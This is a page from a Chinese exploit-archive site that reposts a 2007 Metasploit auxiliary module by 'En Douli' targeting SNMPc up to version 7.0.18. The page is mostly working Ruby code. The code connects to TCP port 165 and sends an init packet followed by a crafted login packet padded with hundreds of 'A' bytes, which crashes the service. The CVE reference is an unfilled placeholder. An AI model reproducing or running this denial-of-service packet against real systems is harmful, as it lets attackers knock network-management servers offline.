首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SNMPc <= 7.0.18 Remote Denial of Service Exploit (meta)
来源:DouliEn@gmail.com 作者:DouliEn 发布时间:2007-06-05  
##
# $Id: snmpc.rb  2007-06-03  $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Auxiliary::Dos::Windows::Snmpc < Msf::Auxiliary

include Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name'           => 'SNMPc ',
'Description'    => %q{
This module sends a specially-crafted packet to the service login of snmpc
causing a denial of service of snmpc.
},
'Author'         => [ 'En Douli, Tks to OaiTeam <DouliEn@gmail.com>' ],
'License'        => MSF_LICENSE,
'Version'        => '$Revision: 1 $',
'References'     =>
[
[ 'CVE', 'XXXXXXX' ],
]))

register_options([Opt::RPORT(165),], self.class)
end

def run
connect
init = "\x14\x00\x00\x00\x70\xa9\x00\x00\x51\x03\x00\x00\x02\x00\x00\x00\x72\x63\x6f\x6e"
pkt = "\x29\x00\x00\x00\xbc\xee\x00\x00\x52\x03\x00\x00\x02\x00\x00\x00\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74"
pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" * 56
pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x09"
pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" * 35
pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x09\x30\x00"

print_status("Sending dos packet ... ")

sock.put(init)
sock.put(pkt)

disconnect
end

end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP Tru64 Remote Secure Shell U
·EQdkp <= 1.3.2 (listmembers.ph
·PBLang <= 4.67.16.a Remote Cod
·Sendcard <= 3.4.1 (Local File
·Comicsense 0.2 (index.php epi)
·IBM Tivoli Provisioning Manage
·DRDoS - Distributed Reflection
·DVD X Player 4.1 Professional
·Wordpress 2.2 (xmlrpc.php) Rem
·IE6 / Provideo Camimage (ISSCa
·NewsSync for phpBB 1.5.0rc6 Re
·Microsoft IIS <= 5.1 Hit Highl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved